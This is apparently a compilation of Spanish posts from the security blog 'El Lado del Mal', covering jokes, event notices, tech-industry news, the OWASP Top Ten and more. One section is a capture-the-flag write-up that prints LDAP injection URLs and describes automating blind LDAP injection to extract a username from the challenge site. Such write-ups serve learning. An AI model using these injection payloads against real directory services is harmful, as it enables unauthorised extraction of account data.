"The formal evaluation of these licenses began in August and the discussion of these licenses was vigourous and thorough. The community raised questions that Microsoft (and others) answered; they raised issues that, when germane to the licenses in question, Microsoft addressed."

¿Es que alguien puede pensar que ha entrado alguna licencia, o éstas mismamente, sin cumplir los pasos? Esto ya se supone, ¿no?

Y recuerda, de la Mafia solo se sale de una forma....

Saludos Malignos!

Para ti tol premio

Después de criarme en Bronxtolex, la ciudad dónde el reportereo más dicharachero de Barrio Sesamo no se llama como se llama, ni cuatro más uno suman lo que suman ni la la ensalada lleva esa cosa redonda y que pica siempre por miedo a la rima fácil.

Si no te sabes las rimas, te vienes un viernes a Bronxtolex y te coges a algún colega de por aquí y le dices...:

"Ey, ¿dónde puedo comprar cebolla?, es que me he entretenido viendo a Gustavo y fijate, ya son y cinco"

y luego me cuentas lo que te ha contestado él. Y cuidado con enfadarte!.

Ahora como ya estamos en Europa, en la zona Euro y en el siglo XXI se ha pasado a un elegante "pa ti tol premio".

- ¿Tienes hora?
- Sí, son menos cinco.
- PA TI TOL PREMIO!
- ¿comorl?
- Nada, que tu no eres de por aquí, ¿verdad?

El martes pasado, en Zaragoza, no pude dejar de sonreir al ver la siguiente campaña de ORACLE:



Así, que nada más verlo, será por haber visto ya varias demos de estas de las que hace el amigo Gospel, será por haberme criado en Bronxtolex, no pude sino pensar:

"Eso, abre el bluetooth, acepta el mensajito que te llega... y para tí todo el premio.."

Saludos Malignos!!

Estas cosas hay que estudiarlas .... a fondo

Me encantan los estudios, las estadísticas y los numerajos. Son tope de divertidos. Además, si los juntamos con la realidad de Internet (solo hay que ver las cifras...), que como ya sabéis se creo para el porno, pues son geniales.

Resulta que las chicas que ponen fotos en sus blogs, espacios de contactos y webs, (ya sabéis, para el rollo eso de las citas y el quedar) etc... reciben muchos más mensajes y ofertas de contacto que las que no ponen su foto.

Lectores cabrones, que solo queréis sexo, que no venís aquí nada más que buscando lo que buscaís. Sniff. Los datos del estudio los tenéis en esta gráfica tan chula.

Girls with Online Photos Get More Attention than Guys. Really?
Yo, en mi infinito afán por el conocimiento he proseguido el estudio y he podido constatar CIENTIFICAMENTE que las que están buenas tienen mogollón de mensajes más que las que ponen fotos y no están tan buenorras. Además si las fotos son morbosas y subidas de tono (o se ve cacha) no sabemos por qué rara ecuación matemática universal, el número de mensajes se dispara.

Tiempo ha, se recogieron en un post la lista de las Bloggers más guapas de aquí y de fuera. Yo las fuí a vistar, ya sabéis, solo como "curiosidad cientifica"... y sí, es cierto, tienen porrón de mensajes....y fotos chulas.

Yo he de confesar que a día de hoy soy fan de un par de chicas bloggers...ya véis lo que es la vida.

En fin, menos mal que tenemos estudios que nos ayudan a entendernos....

Recordatorio: Vigo

Simplemente recordaros que mañana, día 18 estamos en Vigo, Todo el día, hay sesión de mañana y sesiónd de tarde. La agenda y el registro en esta URL: 18 Octubre: Vigo

... y la semana que viene, gracias a la colaboración de la Fundación Caixnova la campaña de Hands On Lab estará allí, en Vigo, con formaciones de Contramedidas Hacker, ISA Server 2006 y Análisis Forense. La información y el registro en la siguiente URL: Vigo: 22/10 al 26/10


Saludos Malignos!

Cansancio por Carles del Collado

****************************************************************************************
Carles del Collado es editor de Windows TI Magazine en España, es un tipo con ese raro sentido del humor digno al más puro estilo Eugenio, serio, con flema y duro, me encanta. Mes a mes me pego mis parrafadas en la sección de Firmas de su revista mientras él, entre muchas cosas, se curra un editorial. Este que ha escrito en la revista del mes de Octubre, me ha sacado una sonrisa y creo que merece que lo leáis y que además esté en El Lado del Mal. Saludos Malignos!

PD: Yo le hubiera titulado directamente Analistas de Salsa Rosa. jeje.
****************************************************************************************
Cansancio

Hará un par de años, a los empleados de Microsoft se les hacía tan insoportable ser asediados en las celebraciones y reuniones con amigos que la compañía fue advertida de que muchos evitaban decir que trabajaban en Microsoft. Era cosa de ver un empleado, y caer sobre él toda la mala prensa, las quejas, las peticiones de software gratis, y por qué no, de una consola. Está claro que hay cosas que un empleado puede hacer y entre ellas no está –por lo general– ir consiguiendo consolas ni copias de Windows, pero tampoco tienen por qué aguantar los problemas particulares de cada una de las instalaciones de los amigos de sus amigos con la pretensión de que alguien que no sea de soporte tenga ni los conocimientos ni las ganas de ir haciendo de help desk de cualquiera, con el sambenito de ser culpable de forma invariable.

Puesto que era inevitable y casi conveniente que los empleados de la casa tuvieran vida social, y a ser posible, satisfactoria, se les ocurrió la idea de dar a cada uno de ellos unas cuantas tarjetas que –en casos desesperados– podían sacarles de un apuro. Se trataba de vales por los cuales los poseedores podían hacer una llamada al centro de soporte de Microsoft de forma gratuita. Era una forma resultona de quitarse de encima al pesado y de paso, descubrir por casualidad que el amigo tenía el XP pirata y que seguro se merecía todo lo que le pasase.

Las cosas habrán mejorado en este aspecto. Pero hay una cosa para que los vales no sirven, que es evitar los análisis felices que cualquiera (normalmente indocumentado) hace sobre las ventas de Windows Vista, o acerca del imparable avance de Firefox, o del fin de Microsoft como compañía ante la amenaza real e inmediata de Ubuntu.

Estoy convencido de que muchos empleados de Microsoft han elaborado una técnica para poder evadirse de hacer de evangelistas ante audiencias tan condicionadas, pero admito que me ha llegado el turno. Estoy harto. Harto de tener que justificar la estrategia de Microsoft, harto de dar cifras sobre penetraciones de mercado, de ventas, de base instalada, de descubrir ante tanto usuario pelado el vasto mundo de los entornos empresariales y de lo que gira alrededor de él, etcétera. Porque tal audiencia, cuando les dices que Windows Vista vendió en cinco semanas más que toda la base instalada de Mac, lo niegan. Y tanto aseguran amar el modo carácter y la línea de mandatos (signo evidente de que eres un geek de los buenos) como a la vez el último interfaz gráfico.

Se trata de un estadio más hacia la santidad. No hay duda. Después de habernos convertido en “el solucionador” de problemas informáticos de familia, amigos y otros varios, ahora además nos las tenemos que ver con analistas del salsa rosa de las tic que rezuman las informaciones de los mass media, que repiten clichés sobre el desastre que se nos avecina, desprendiendo satisfacción –la del ignorante– como si en esta guerra él tuviera acciones y su éxito personal y profesional estuviera ligado a eso.

Artículo en Site Original: Cansancio

A la “piuta” calle

En esto de los cambios laborales, normalmente suele haber “nuevas orientaciones profesionales”, buenas palabras y parabienes dónde un tipo pacta su salida de una compañía de tal forma que todo quede bonito de cara a la prensa. No son muchos los que se van haciendo ruido porque es algo que no interesa ni a la empresa ni a la persona que se va.

En este caso el despido es de Crispin Cowan, un viejo conocido en esto de la seguridad, y es despedido de Novell, dónde actualmente curraba en un proyecto de seguridad [Novell Apparmor]. Su currículo completo lo tenéis en su página web personal.

Crispin Cowan es famoso en este mundo de la seguridad desde hace bastante tiempo, de hecho, la primera implementación de la teoría de los canarios para proteger la memoria frente a sobreescritura (stack smashing protection), técnica utilizada en ataques de buffer overflow sobre variables apiladas para gcc, allá por el año 1997.

Tiempo después, se embarcó en dos grandes proyectos, en primer lugar la compañía Inmunix, cuyo objetivo era integrar todos los mecanismos de control y auditoría de seguridad en un único sistema y Sardonix, un proyecto cuyo objetivo era auditar y medir la auditoría realizada en los proyectos open source.

Después de abandonar ambos proyectos, no sin polémica sobre todo por la caída de Sardonix donde dijo: “security researchers were only interested in finding splashy bugs and posting them to security mailing lists” pasó a ingresar en la nómina de Novell para trabajar en Apparmor después de que esta comprara Inmunix. Manteniendo el trabajo en Apparmor, el objetivo es ofrecer una solución de fortificación para servidores Linux mediante el perfilado de seguridad de los componentes del sistema. Es una alternativa distinta a SELinux que integran los Servidores SUSE.

El 28 de Septiembre le han largado a la piuta calle y ha montado la empresa Mercenary Linux especializada en fortificar servidores Linux, con Apparmor y cualquier otra herramienta de fortificación. [http://www.mercenarylinux.com/]

En declaraciones sobre su despido Crispin ha dicho:

“I'm stunned. I was getting bonuses and raises and awards up until the time I was laid off."

Algo así, como estoy filpando. Estaba obteniendo pasta en bonus, ascensos y premios hasta que me largaron. Y parece que la discusión podría ser por cómo llevar el proyecto.

"Novell wants the community to pick up maintenance and development of AppArmor. But tossing it in the wind and hoping is not good enough assurance for me, so now it's my business to go find sponsors who are willing to pay for AppArmor development”

Amos, que Novell quiere que lo mantenga la comunidad y no directamente ellos, según Cowan. Novell por su parte alega que ha sido una reestructuración normal, pero parece algo sospechoso. Ubuntu se centró en Apparmor este año y Mandriva ya la usa, así que un proyecto que parece tan goloso se queda un poco desangelado. El proyecto continuará, pero es una pena perder el empuje de Novell.

La pregunta es, ¿Por qué cuando muchas empresas quieren mantener el control de los proyectos Open Source, véase la competición SUN, IBM por OpenOffice, como uno de muchos ejemplos, Novell prefiere quitarse control?

"Parrajaco" De los Santos en el DISI IIDía Internacional de la Seguridad Informática II

Sí, así como lo oyes, el próximo día 3 de Diciembre, lunes, laborable para más pistas, actuará como cabeza de cartel en el Día Internacional de La Seguridad Informática II. Unas charlas promovidad, gestionadas y peleadas por nuestro querido Jorge "Little Buda" Ramió [ojo!, que tiene la foto actualizada!], quien se empeña en dedicar un día al año para montar un sarao futa Madre.

Como "teloneros" de nuestra aclamada estrella, de Hispasec Sistemas, vendrá algunas "jovenes promesas" de la canción, como el Doctor Martin Hellman (no, no es el de la mahoneas), y el Doctor Hugo Scolnik.

También tendremos a "chavalines" como Juan Carlos García Cuartango, Manuel Ballester y un montón de gente que viene a cantar cosas Chulas.

El concierto tendrá lugar en la Escuela Universitaría de Informática de la Universidad Politécnica de Madrid (dónde yo estudié hace ya tantos años!! snif!!) y teneis que registraros cuanto antes porque hay solo 525 plazas, y, sólo con la presencia de la estrella se va a llenar seguro!

Ah, y antes, recuerda, que el día 7 de Noviembre, con entrada gratis para el SIMO tenéis otro concierto, el Spectra Technet Security Day y el Live Technology Tour!.

Madrid: DISI II.
Madrid: Spectra Technet Security Day.
Vigo y Zaragoza: Live Technology Tour.

Nos vemos en los tres fiestorros ... y las noches antes en los bares!

¿Caida imparable de Apache?

Han salido las estadisticas de Netcraft hasta el mes de Septiembre de 2007 sobre los WebServers. Apache ha crecido en 1 millón de sitios nuevso mientras que IIS ha crecido en 3 millones (de los cuales 1 millón son de Live.com) dejando la distancia en 7.5 puntos entre ámbos.

Como las estadísticas nunca caen a gusto de todos, durante años la queja de los partidarios de Spectra IIS ha sido "claro, los servidores de Hosting gratuito usan Apache" y ahora los partidarios de Apache dicen "claro, son las locas fanáticas de la "gruirgni espiiirs" que se sacan blogs en MSN". En los sitios activos Blogger, de Google ha crecido, pero menos que IIS. Mientras Google crece un 0.65, Spectra IIS gana un 1.60. Ambos son los únicos que suben quitándole cuota a todos los demás.

Netcraft Survery Sep 2007
¿Acabarán las bloggers fanáticas con Apache? ¿Remontará Apache? ¿Dominará IIS como domina en los servidores de la Fortune 1000?.

Saludos malignos!

El Top Ten

Acabo de leerme el documento de OWASP en el que se publican las diez vulnerabilidades más explotadas y peligrosas en aplicaciones Web hoy en día. Dicha lista está encabezada por el XSS (Cross-Site Scripting) sorprendentemente. También es destacable ver como CSRF (Cross-Site Request Forgery) se situa en el quinto lugar. Sigue llamando poderosamente la atención como SQL Injection sigue siento tan peligroso y tan activo a día de hoy.

La lista completa es la siguiente:

1.- Cross Site Scripting (XSS): Persistentes, No-persistentes.
2.- Injection Flaws: Especialmente SQL Injection.
3.- Malicious File Execution: Ataques RFI
4.- Insecure Direct Object Reference. Manipulación de rutas a objetos. Cucharones y demases.
5.- Cross Site Request Forgery (CSRF): Forzado de acciones de usuario.
6.- Information Leakage and Improper Error Handling. Mala gestión de mensajes de error.
7.- Broken Authentication and Session Management: Robo de identidades. Hijackings, etc...
8.- Insecure Cryptographic Storage: Almacenamiento inseguro.
9.- Insecure Communications
10.- Failure to Restrict URL Access: URLS mal ocultadas. Spidering, bruteforce, etc...

Han emitido un documento PDF de 35 paginitas muy chulo en el que explican cada uno de los ataques, su impacto y como mitigarlo. Además, dan urls para profundizar el acceso.

THE TEN MOST CRITICAL WEB APPLICATION SECURITY VULNERABILITIES

Tras leerlo hay dos cosas que creo que deberían estar y no están, que le vamos a hacer:

1.- Mención de los ataques a ciegas: En todo el documento no se hace ninguna referencia a la posibilidad de que los ataques sean realizados a ciegas. No es absolutamente necesario pues si no hay vulnerabilidad en el código no hay forma de explotarlos ni de forma visible ni a ciegas, pero creo que se debería haber citado las explotaciones "Blind" SQL Injection y "Blind" XPath Injection, documentadas hace ya bastaten tiempo.

2.- LDAP Injection. Las referencias que se hace sobre LDAP Injection son someras y se linka un documento cuya única injección mostrada consiste en poner un *. Dicho documento referencia al documento de Sacha Faust, cuyas inyecciones propuestas no funcionan igual en OpenLDAP ni en ADAM con lo cual queda bastante "escueto". Lógicamente tampoco se habla de Blind LDAP Injection.

Por lo demás, lectura recomendada para tener en cuenta si vas a realizar una aplicación Web.

Saludos malignos!

El profeta Jeremías. Redhat demandada.

Ahora sí que se ha montado la gorda con RedHat. La historia comienza con un ligero retraso en el lanzamiento de RedHat Global Desktop. Ayer, la compañía del sombrero rojo, dijo que solo se debe, en principio, a querer dar soporte a todas las arquitecturas Intel.

La semana pasada, el Profeta Jeremías, o mejor dicho, un bien informado Steve Ballmer, en una charla en Londres, contaba muchas cosas, pero básicamente daba dos mensajes:

1.- Red Hat inflinge la Propiedad Intellectual de las empresas sin importarle.



El equipo de propiedad intelectual de Red Hat había respondido con un mensaje de confianza ya meses antes sobre las agoreras profecías del profeta Jeremías. “Despliega con confianza” se titulaba el post en el que básicamente decía que para proteger las patentes usadas en Red Hat está la Open Innovation Network y además redirigía a los visitantes hacia un documento de Gartner titulado “Microsoft Patent Claims Pose No Immediate Risk for Users”, algo así, como la posición de reclamo de patentes por parte de Spectra no supone un riesgo inmediato para los usuarios. Sí, es cierto, no ha dicho que No suponga un riesgo, sino que no supone un Riesgo Inmediato… para los usuarios.

Dicho y hecho… el día 9 de Octubre, casi siguiendo a las palabras de Jeremías en Londres demanda al canto para Red Hat...y Novell por violación de Propiedad Intelectual:

Oct. 9: IP Innovation LLC et al vs. Red Hat Inc. et al

Plaintiffs IP Innovation and Technology Licensing Corp. claim to have the rights to U.S. Patent No. 5,072,412 for a User Interface with Multiple Workspaces for Sharing Display System Objects issued Dec. 10, 1991 along with two other similar patents.

Defendants Red Hat Inc. and Novell have allegedly committed acts of infringement through products including the Red Hat Linux system, the Novell Suse Linex Enterprise Desktop and the Novell Suse Linex Enterprise Server.

El origen de la disputa es una patente sobre el interfaz de usuario con múltiples espacios de trabajo (“User Interface with Multiple Workspaces for Sharing Display System”). Esta mismita patente ya le tocó sufrirla a Apple que fue demandada y además al final claudicó con ella.

Todos están buscando la mano de Spectra por detrás de toda esta situación y se ha montado un thread que he sido incapaz de terminar de leer.

Para muchos esto implica la necesidad de cambio en los sistemas de patentes, para otros significa que el copyright hay que respetarlo y si no pagar la multa. Opiniones como la de Linus Torvalds son analizadas en detalle en estos casos, que con frases como "Linux is not free software" hace temblar Internet.

El caso es que RedHat, parece ser el único que se está quedando fuera de todas las jugadas, mientras Sun se acerca a Linux, libera sus productos e intenta colocarse bien con StarOffice y se pone a vender Windows, IBM busca sus aliados con OpenOffice, ODF o Lotus Symphony, Ubuntu busca sus acuerdos con los fabricantes de hardware y Oracle busca quedarse con las instalaciones Linux de sus servidores Oracle, RedHat se centra en sus planes para sacar su sistema operativo Web y se le acaba ya el tiempo para ser, como dijo hace un año, el único “Linux Player”.

2.- El correo electrónico tiene información valiosísima para los sistemas de publicidad y mientras Google lee el correo, Spectra no lo hace.



Por otro lado, las explicaciones que da Google relativas a la frase de Ballmer son:

"Google's computers process the information in your messages for various purposes, including formatting and displaying the information to you, delivering advertisements and related links, preventing unsolicited bulk email (spam), backing up your messages, and other purposes relating to offering you Gmail."

¿Crees que analiza el correo para ofrecer publicidad dirigida? ¿Es eso un riesgo de privacidad?

¿Cuál es tu opinión? ¿Irán a por Google ahora por leer los correos?¿Volverá Raúl a la selección? ¿Ganará Fernando Alonso el Mundial?

Saludos Malignos!

PD: Vaya post de sabado de puente...

Momentus Ridiculous X

La vida de un superheroe es dura, perder a un familiar que te trastorne para siempre, ser picado por un bicho radiactivo, nacer diferente y ser perseguido... ser como el motorista fantasma, la cosa del pantano o la cosa de los 4f, que, entre nosotros, no tiene mucho glamour....

Luego vienen la metafísica de una sola frase: "Un gran poder conlleva una gran responsabilidad", "es un trabajo duro, pero alguien tiene que hacerlo", "Es la hora de las tortas", "soy el mejor en lo que hago", "te voy a dar más hostias que copias piratas tiene windows", etc...

Pero lo peor de todo es mantener la identidad secreta. Ahí tenemos a Superman, con el duro trabajo de ponerse un sombrero, unas gafas y retorcerse el caracolillo del flequillo en una cabina de telefonos a supervelocidad o Spiderman, llenando de tela de araña los gallumbos limpios y colgandolo en lo alto de edificios, que cuando los recoja estarán llenos de cagadas de pájaros.

Nosotros no aguantamos más y tuvimos que desvelar la verdad.

5 de Octubre de 2007. Las cuatro Fantasticas

En la última charla del Open Day tuvimos que confesarnos los 4 y soltar todo lo que llevabamos dentro.

Momento de la confesión
Allí, La Chica No-Visible, que vino en pelotas, El Chico Llama de Mechero, La Cosa esa del Windows Vista y yo, El Hombre Cuasi-Elastico (que solo me crecen algunas partes del cuerpo...) nos confesamos y públicamente desvelamos nuestra identidad secreta.


Cambiando el traje
Ya liberados, nos hicimos unas fotos La Chica No-Visible desnuda, El Chico Llama de Mechero y yo.

Izda. a dcha: Chica No-Visible, Llama de Mechero,Cuasi-Elastico
Todo fue mucho más fácil desde ese momento, solo que, al cambiarnos a super-velocidad no me di cuenta y confundí el cinturón de Otra de mis Identidades Secretas . Al final el Bien triunfó y, como se puede ver en la foto la Chica No-Visible le recompensó cariñosamente al Hombre Cuasi-Elastico, como se puede ver en la foto.

Hombre Cuasi-Elastico siendo recompensado por Chica No-Visible

A partir de ahora el mundo estará un poco más seguro... ¿o no?

Saludos malignos!

Pedro Laguna

PL. Sevillano, pelirrojo, alto, amigo del XSS y javascript (geek). En su haber cuenta con haber dado una charla con Dani Kachakil en el famoso evento con resaca (ya veréis los videos). Actualmente curra conmigo (gracias!) y hasta el momento no ha conseguido ganar ninguno de los retos, pero espero que gane el siguiente :P. Le hice fan de una de mis pelis preferidas y ha hecho el solucionario del Reto Hacking IV, del que fue 4º, por delante de RoMaNSoFt, (juas!) (vale, Román estaba de vacaciones y lo hizo cuando llegó, jeje...pero firmó por delante...) haciendo un homenaje a la película. Os lo dejo aquí. Solucionario.

Si alguien quiere aprender de él, la semana del 22 de Octubre va a impartir unas formaciones de seguridad en Madrid sobre Ataques Remotos y Análisis Forense. Promete no ir resacoso (XD,XD)

Saludos Malignos!

Solucionario del Reto Hacking 4 por Pedro Laguna

El reto comenzó como Chema había prometido, a las 20:00 del día 31 de agosto de 2007… ¡¡¡justo cuando estaba mudándome!!! No se como se las apaña para que siempre que publica un reto a mi me pille en mitad de algo y no pueda ponerme 100% con el… no se, el próximo debería de publicarlo un 31 de diciembre a las 23:55, seguro que no me pilla haciendo nada…

Syntax
Entramos en la página del reto… Y nos encontramos que esta ambientada en la serie de Alias. Muy bien, para una serie que no sigo y ahora me va a tocar ponerme al día… Menos mal que para los primeros compases se nos pone en antecedentes… Somos una espía que esta trozo de potable y que debemos entrar en la red de Profeta 5. La cosa pinta bien.

Observamos tres apartados:

• Acceso: Nos ofrece el típico usuario/contraseña. Esta parte tiene pinta de que no vamos a tener que tocarla hasta el final del reto

• Recursos: Aquí observamos que podemos listar los recursos de tipo impresora o terminal que hay en las distintas plantas. Tiene buena pinta y parece el punto critico de la aplicación

• Recuperar contraseña: Interesante funcionalidad para un servicio de alta seguridad como se presupone a una organización ultra secreta. De todas formas seguro que llegado el momento podemos sacarle alguna utilidad.

Vagary
Vamos a empezar a jugar con la aplicación, a ver que tiene para ofrecernos. Vamos a empezar por realizar un listado de los parámetros que puede recibir la pagina Default.aspx

• usuario
• password
• recurso – Puede tomar de la aplicación los valores Impresora y Terminal
• planta – Toma los valores de Primera Planta, Segunda Planta y Tercera Planta
• uid
• rPassword – Este parámetro recibe por defecto un valor true
• respuesta

De aquí podemos empezar a jugar con algunas cosas. Para empezar vamos a ver que pasa si modificamos alguno de los parámetros del buscador, por ejemplo:

http://retohacking4.elladodelmal.com/Default.aspx?recurso=Terminal&planta=Primera+Planta and 1=1

Vaya, parece que esta vez no va a ir de Blind SQL Injection…

Purgation
Ok, parece que esto no es vulnerable a Blind SQL Injection… pero… ¿es que acaso hay algo más? Pues si, hay muchísimos más tipos de vulnerabilidades, como por ejemplo el XSS o el CSRF.

La OWASP (The Open Web Application Security Project) tiene una guía sobre vulnerabilidades, soluciones y recomendaciones donde podemos encontrar todo un listado con los últimos fallos de seguridad y una explicación teórica de su fundamento y su manera de explotarlos.

http://www.owasp.org/index.php/Guide_Table_of_Contents

Ahora tenemos una lista con un montón de fallos y una pagina vulnerable. Veamos como podemos asociarlas… Aparte de los parámetros que tenemos para hacer las búsquedas en los recursos de la sociedad secreta vemos que hay uno que nos puede servir de pista: uid. Vamos a usar el buscador del Wiki de la OWASP para buscar si hay alguna técnica que use un parámetro llamado uid… ¡Bingo! ¡Los primeros resultados que nos muestra mencionan LDAP Injection!

Harbinger
¿Y si estuviésemos consultando un árbol LDAP? Bien, vale, espera… ¿No sabes lo que es LDAP? Así para resumirlo un poco y que al menos sepas de lo que vamos a hablar te comentare que un árbol LDAP es una estructura que guarda datos referentes a la configuración física y lógica de un conjunto de ordenadores, personas, impresoras y resto de dispositivos que puedan conectarse a una red.

Este árbol puede ser consultado para que nos devuelva los datos que contiene. Esto se hace mendiante sentencias LDAP que pueden ser algo como: (cn=retos) y nos devolvería todo aquello que perteneciese al atributo reto o por ejemplo… (recurso=Impresora)(planta=Primera+Planta), que podría ser lo que estuviera haciendo por debajo la aplicación.

Perspicacity
Bien, ahora que sabemos que la sentencia LDAP (si es que es LDAP) debería de ser una cosa como “(cn=”.$recurso.”)(planta=”.$planta.”)” podríamos pensar que si sustituimos el valor de los recursos y las plantas por el comodín (*) nos debería de devolver todos los recursos disponibles en todas las plantas. Probemos:

http://retohacking4.elladodelmal.com/Default.aspx?recurso=*&planta=*

Total: 12 O lo que es lo mismo… ¡Todas las impresoras y todos los terminales que hay en todas las plantas! (Compruébalo si no me crees) Parece que vamos bien…

Paradigm
Antes de empezar a meter asteriscos, paréntesis e iguales como locos vamos a pararnos a pensar… Si hemos afirmado que la sentencia es “(cn=”.$recurso.”)(planta=”.$planta.”)” si introdujésemos en el valor de $recurso la cadena “Impresora)(planta=Primera Planta)” y eliminásemos el parámetro planta deberíamos de obtener los mismos resultados que si seleccionásemos la búsqueda por defecto, ¿no?

http://retohacking4.elladodelmal.com/Default.aspx?recurso=Impresora)(planta=Primera%20Planta)

Total: 3 Por lo que nuestra suposición parece correcta, parece que hemos acertado acerca de la sentencia que ejecuta la aplicación contra el árbol LDAP.

Whimsy
Ahora que sabemos que nos enfrentamos a un árbol LDAP y que según la introducción al reto debemos de encontrar un usuario valido del sistema, se nos plantea la duda de como conseguirlo.

Muy bien, sabemos que con el carácter * podemos completar todo o una parte de un campo y que a Chema le encanta ir ciego… por lo tanto, ¿porque no pensar en Blind LDAP Injection?

Quizás si vamos preguntando poco a poco a la aplicación sobre si un determinado campo empieza con una determinada letra y nos devuelve cierto (numero de impresoras/terminales conocidos) o nos devuelve falso (Total: 0) podamos determinar los valores de ciertos campos del árbol.

Quandary
¿Que campos contendrá el árbol LDAP? ¿Cuál podrá sernos útil? ¿Cuál es el sentido de la vida, el universo y todo lo demás?

Para la ultima pregunta la respuesta es fácil, 42. Para las otras dos la respuesta la vuelve a tener la aplicación: uid

http://retohacking4.elladodelmal.com/Default.aspx?recurso=*)(uid=*)

Total: 1

¡Esto marcha!

Lamentation
La informática es la ciencia de automatizar las áreas repetitivas, así que vamos a buscar algo en Google que haga lo que nosotros queremos.

http://www.google.com/search?hl=en&q=%22blind+ldap+injection%22&btnG=Google+Search

Vaya, parece que no hay nada sobre este tema… Tendremos que trabajar nosotros.

Juxtaposition
Si en el Blind SQL Injection íbamos preguntando carácter a carácter, aquí vamos a realizar lo mismo, iremos probando sentencias como sigue:

http://retohacking4.elladodelmal.com/Default.aspx?recurso=*)(uid=*) – Total: 1
http://retohacking4.elladodelmal.com/Default.aspx?recurso=*)(uid=a*) – Total: 0
http://retohacking4.elladodelmal.com/Default.aspx?recurso=*)(uid=b*) – Total: 0
http://retohacking4.elladodelmal.com/Default.aspx?recurso=*)(uid=s*) – Total: 1

Por tanto vamos a seguir el mismo proceso que para el Blind SQL Injection. (Realmente no es el mismo, pues en SQL podemos preguntar por el valor ASCII de un determinado carácter, aquí debemos probar uno a uno)

Catharsis
Ha llegado el momento de abrir nuestro IDE favorito (si, el notepad también vale, o el emacs…) y programarnos nuestra pequeña aplicación que automatice este proceso (También puedes hacerlo a mano…).

Yo en mi caso he usado C#, con un simple WebClient que realizaba las peticiones y comprobaba si estas contenían el texto “Total: 1” para comprobar si habíamos encontrado un valor válido.


Vilification
¡Genial! Con este usuario (sd6.sloane.arvin) ya podemos irnos a la parte de recuperación de contraseñas…

Denouement
Una vez introducimos el usuario y pulsamos el botón de Check , nos muestra la pregunta secreta del usuario, en este caso: “¿Dónde se cerro el Circulo?”

Para responder a esta pregunta deberíamos de habernos visto la serie, los 105 capítulos de los que se compone, pero haciendo un uso apropiado de Google podremos encontrar la respuesta fácilmente… ¡Y esto ya os lo dejo a vosotros!

Pedro Laguna Durán

Otro discursito del abuelo Parada

En otra de sus grandes intervenciones radiofónicas, el abuelo nos deslumbro con esta presentación para los Terminal Services Gateways:

"Sin sencillez y seguridad inútil se vuelve el acceso….Cuantos segundos, minutos, horas y largas veladas, no hemos dedicado los administradores a configurar el acceso remoto a los equipos de nuestra red. Difícil tarea la de vencer a los Routers y firewalls interpuestos en nuestro camino. Agridulce la labor a menudo infecunda de convencer a los que sostienen la responsabilidad sobre equipos de comunicaciones de nuestros propósitos. Inútil y frustrante la de explicar al usuario incapaz, la vereda a seguir para procurarse acceso a todas sus aplicaciones y datos. Cuan ingrata la sensación de verse solo, acosado, perseguido y repudiado por todos.

Pero cuando prende en nuestra mentalidad científica la llama de un objetivo, cuando seducidos por la belleza de lo efectivo y novedoso nos fijamos una meta, deja de tener valor el tiempo y toda adversidad es pequeña, pues el hombre tiene esa capacidad extrema para sobreponerse a las contrariedades, para pelear contra su destino, y así, cuanto más alta es la cumbre, cuanto más inalcanzable el meta, tanto más arrojo mostramos, tanto más firme y terca se muestra nuestra voluntad férrea.

Pero no se detiene la voluntad humana al alcanzar una meta. Y al igual que el Record no es el final del camino, sino el inicio de un nuevo sueño, así, conseguida nuestra meta tecnológica de la comunicación, pretendemos siempre alcanzarla de nueva manera más sencilla, más efectiva más rápida, menos molesta e incómoda para todos.

Para los no quieren configurar por enésima vez el router, para los que no quieren pegarse con los de el equipo de comunicaciones ni dejar el Firewall como un queso grouller, para los que quieren mantenerse a una distancia prudencial de los incómodos usuarios, para los que buscan soluciones sencillas a problemas complejos, para todos vosotros presentamos hoy TS Gateway…… porque sin sencillez y seguridad inútil se vuelvo acceso…."

Fdo: Pepe el evangelista.

Hoy toca…

Qué me gusta madrugar es algo que muchos sabéis y otros podríais haber intuido viendo los horarios de mis posts. Es en esa hora de la mañana cuando las calles aún no están puestas cuando mi cerebro mejor funciona. En ese momento, justo antes de poner el post del día es cuando decido el día que me quiero dar.

Si es un día en el que tengo ganas de cachondeo o me levanto peleón toca un día de Caña, para no olvidarme de mis amigos los Técnicoless, que siempre dicen cosas divertidas.

- Armas de doble Filo, por silverhack. Rootkits en Linux y la ciudad de los Kispis.

Si es un día en el que voy a estar ocupado de viaje o conferencias entonces toca un día de Post técnico. No hay como poner un post sobre Oracle o un artículo de 7 páginas para tomarnos el día con cierto relax.

- A Multi-perspective Analysis of the Storm (Peacomm)Worm. A debuggear gusanos.

Los días de poco curro, o en los que voy a tener tiempo para contestar mails saquemos algunos números de esos que tanto o tan poco gustan, para discutir sobre los valores incontables.

- eBay: Phishers getting better organised, using Linux. ¿Phishers usando servidores Linux zombies? ¡Eso es imposible! ¿o no?

Luego queda la opción del día tener un día cómodo y contar algún truco medio olvidado, alguna tool que está por ahí en el canasto o un artículo interesante.

- SQL Injection en MySQL, nuevos viejos trucos. Averiguar la versión usando comentarios.

…o recordaros algún evento:

- El próximo 18 de Octubre, cumpleaños del abuelo, estamos en Vigo!

Y si no, siempre puedes hacer el capullo con alguna cosa chula para que la gente encuentre “el chiste”.

- ING. Vence a la pereza, y como dice Mandingo, "no dejes que los árboles te impidan ver el bosque".

Hoy, solo por el placer de tocar las narices, voy a hacer un poco de todo, para estar “a tutiplén”.

¡Saludos malignos!

Catch the "KINKI"

Todos los años fiscales se realiza el Spectra Security Day, que es el evento más grande en seguridad que realiza Spectra en España para lavar la mente de los usuarios. Este año el objetivo se va a centrar en Estafas en Internet. El objetivo es analizar el funcionamiento de alguna de las estafas más comunes en Internet y que herramientas tenemos para protegernos ante ellas.

Ya veremos que os parece lo que vamos a preparar. Además, como lo vamos a celebrar coincidiendo con el SIMO, todos los asistentes tendrán derecho a invitación para entrar en la feria, con lo que por la tarde podrán entrar en el SIMO a apren... digo... a recoger goodies y visitar a los azafatos y azafatas que amablemente os enseñarán cosas.

La fecha para la que está previsto el evento es el día 7 de Noviembre de 2007 y para intentar que nadie se quede fuera os dejo el registro ahora mismo.

Spectra Technet Security Day

Lo hemos planificado para que vengáis a vernos, os invitamos a desayunar, os damos la entrada, veis el SIMO y a casita que llueve. Y si venís de fuera de Madrid, pues añadid la noche antes un paseo por Tribunal, Chueca o Lavapies para tomaros "un algo". ;)

¡Saludos malignos!

Windows 98 vuelve a superar a Linux

